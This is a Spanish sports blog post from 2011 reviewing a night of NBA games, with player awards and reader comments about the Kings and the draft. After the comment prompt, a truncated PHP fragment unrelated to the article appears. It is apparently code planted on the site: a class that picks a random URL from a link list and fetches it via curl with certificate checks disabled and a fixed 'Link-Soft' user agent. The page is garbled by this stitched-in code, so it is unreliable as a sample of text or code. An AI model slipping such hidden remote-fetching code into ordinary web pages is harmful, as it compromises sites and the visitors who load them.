La Crónica (29/03/2011)

30 de March de 2011 por Hynreck

“The Diary of Jane” es una canción de un grupo estadounidense llamado Breaking Benjamin. Una estrofa de ella ilustra muy bien lo acontecido anoche en el Quicken Loans Arena de Cleveland. “There’s a fine line between love and hate” reza. El ambiente que se respiraba era de crispación, de rencor hacia alguien que se había querido mucho y por quien, los aficionados de los Cavs, se han sentido engañados. Dan Gilbert seguro que fue quien más disfrutó anoche viendo como sus chicos (probablemente el peor equipo de toda la liga) mojaba la oreja de King James & cia. Y no será porque éste no lo intentase todo para llevarse el partido. Llegó al triple doble pero sólo le secundó Wade y un sorprendente Mike Bibby, que en su rol de jugador unidimensional logró un 7 de 11 en triples. Ni siquiera lo intentó de 2. En los Cavs todo bastante repartido destacando a JJ. Hickson y a Anthony Parker, y la defensa que ejercieron sobre James, Alonzo Gee y el ex de la Penya Eyenga, quienes le secaron en el segundo y casi al completo en el tercer cuarto. Finalmente 90-102 para Cleveland. Que lo disfruten pues hasta la próxima temporada no parece que se puedan correr otra juerga parecida.

En otro orden de cosas Oklahoma City sufrió de lo lindo para derrotar a unos Warriors que cuando tienen el día pueden producir dolores de cabeza a cualquiera. La mejor versión de Kevin Durant tuvo que aparecer para rescatar a los suyos en la prórroga. Los Thunder ganaban de 6 a falta de 13 segundos pero tras un triple de Reggie Williams, éstos decidieron hacerse un hara-kiri al más puro estilo Thiago Splitter ’05. Daequan Cook regaló el balón de fondo a Monta Ellis, quien decidió aceptar el regalo anotando otra vez de 3 sin oposición y mandando el partido a la prórroga [Video]. En ella, el ya mencionado Kevin Durant mantuvo a su equipo en el partido, sentenciando un tiro libre de Westbrook para poner finalmente el 114-115.

En New Jersey asistieron a otra derrota de los suyos. Si todas las esperanzas de los tuyos recaen en Illgauskas 2.0 (es decir, Brook Lopez), lo normal es que les que pase lo que les pasa. Victoria para unos Rockets que siguen soñando con los playoffs (87-112).

Quienes ya han dicho prácticamente adiós a ellos son los Suns tras caer en Sacramento. Marcus Thornton sigue a un gran nivel, mientras que poco a poco Tyreke Evans va recuperándose. La buena noticia para los Suns es que Marcin Gortat por fin ha desbancado a Robin Lopez como titular (dato: Robin Lopez lleva 16 partidos seguidos sin repartir una sóla asistencia). 116 a 113 para los Kings y ambos equipos a pensar en el draft.

PREMIOS

MVP: Kevin Durant, hoy no hay dudas. 39 puntos, 6 rebotes y 5 asistencias siendo fundamental en la prórroga. Premio para él. Otra vez se queda a las puertas Marcus Thornton.

Rookie: Buenos partidos de Ekpeh Udoh y Patrick Patterson, pero el premio una vez más es para DeMarcus Cousins con 17 puntos, 7 rebotes y 8 asistencias.

Sorpresa: Los 20 puntos, 7 rebotes y 2 asistencias de Anthony Parker se llevan el premio, aunque también merece ser destacado en ése mismo partido Mike Bibby con sus 7 triples para 23 puntos.

Decepción: Los Heat echaron de menos a Chris Bosh (10 puntos con 5 de 14 en tiros). Al Big Three  le falla una pata en demasiadas ocasiones.

Esfuerzo en vano: El triple doble de LeBron James podría ser perfectamente el elegido (“El elegido”, ¿a qué me recuerda?) pero se lo daremos a Stephen Curry quien murió en la orilla con los suyos marcándose 35 puntos, 6 rebotes y 5 asistencias.

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. Len Bias dice:
    #1

    No se ve muchas veces un pivot tan asistente como Cousins, aunque en Sacramento…

      Citar

  2. Vader dice:
    #2

    Bien por los Cavs, sacaron el orgullo. Karma strike back!!!

      Citar

  3. KB # 24 dice:
    #3

    Karma 1 – Lebron 1

      Citar

  4. Pablo^ dice:
    #4

    Después del guiño a Breaing Benjamin no he podido resistirme…

    El partido de anoche demuestra lo poco que se necesita para ser feliz y las ansias de revancha; pasar de grandes aspirantes a peor equipo de la liga se deja de lado siempre y cuando haya sangre en el cuello del gran enemigo.

    Gran jugador Cousins que ha tardado en mostrar lo que demostró en las Summer Leagues, muy buena pinta…

      Citar

  5. Sancho88 dice:
    #5

    Hombre, los 20 años son muy malos, Pablo. Son los que tiene este chico, casi eran normales sus idas de olla. Pero me parece que despues de su añito placido en Kentucky, ha visto la crudeza del basket de perder casi todas las noches, y eso le ha hecho fuerte. Soy optimista con respecto a los Kings. El Maloof más implicado ha dicho que quiere que cesen las intentonas de Anaheim por comprar el equipo, que tienen una responsabilidad con Sacramento. Espero que eso sea así, verdaderamente.
    Despues, con Tyreke y Cousins, el makinon Marcus Thornton (te voy a meter triples hasta que me contraten los GSW), Jason Thompson (talento, esfuerzo… muchas cosas), Udrih (manita de escandalo), García (este jambo defiende como dios y hace muchisimo grupo, me recuerda a Corliss Williamson), etc., ademas de ser el equipo con mas espacio salarial, jovenes y con gran proyeccion, un muy buen puesto en el draft (rezaré para que sea Kemba Walker el elegido, un base verdadero de una vez por todas…), los 12 milloncetes de Dalembert… vamos, quien no se quiera venir a un equipo asi… espero que de verdad continuen con el proyecto, que no gasten la pasta en Rones Artest de la vida (gente que no se implica, y sí, he estado vivo los ultimos tres años de Artest, se lo que esta haciendo este chico en LA), pero me entendeis, gente con rango de estrella que no hace progresar a tu equipo, y lo digo porque cuando estuvo Artest en Sacramento fue una mierda.
    Es decir, a ver si confian en el proyecto y puedo ver a los Kings en lo mas arriba en unos añitos, junto a Clippers y derivados. Muy dificil, ya que Tyreke o Griffin son los proximos Melos, James, etc. de la liga, y dejaran huérfanos a sus equipos cuando tengan la oportunidad. Pero bueno, los aficionados de los Kings nos conformamos con volver a ver una temporada +40 y una primera ronda contra Suns, Dallas… gente asi para vengarnos, jeje. Nos valen los Lakers tambien, obviamente. Menudo robo aquel…

      Citar

  6. Txusma dice:
    #6

    Kemba Walker y Tyreke Evans juntos? No lo veo. Mi sensanción es que necesitan bastante balón ambos y si encima está por ahí Demarcus “Cabecita Loca” Cousins ya no te cuento… Si se busca un base de verdad Kyrie Irving es mucha mejor opción.

      Citar

  7. Sancho88 dice:
    #7

    Jeje, pues ese entonces. Es que lo que necesita Sacramento es un chico que los calme y los sepa dirigir. Y Evans a mi no me convence en ese rol, no lo veo con la suficiente experiencia. De momento le veo mucho más escolta que base, aunque esta claro que alguna jugada sí que puede ejecutar, sobre todo 1 contra 1. Ahí va sobrado. gracias por la aclaracion Txusma

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>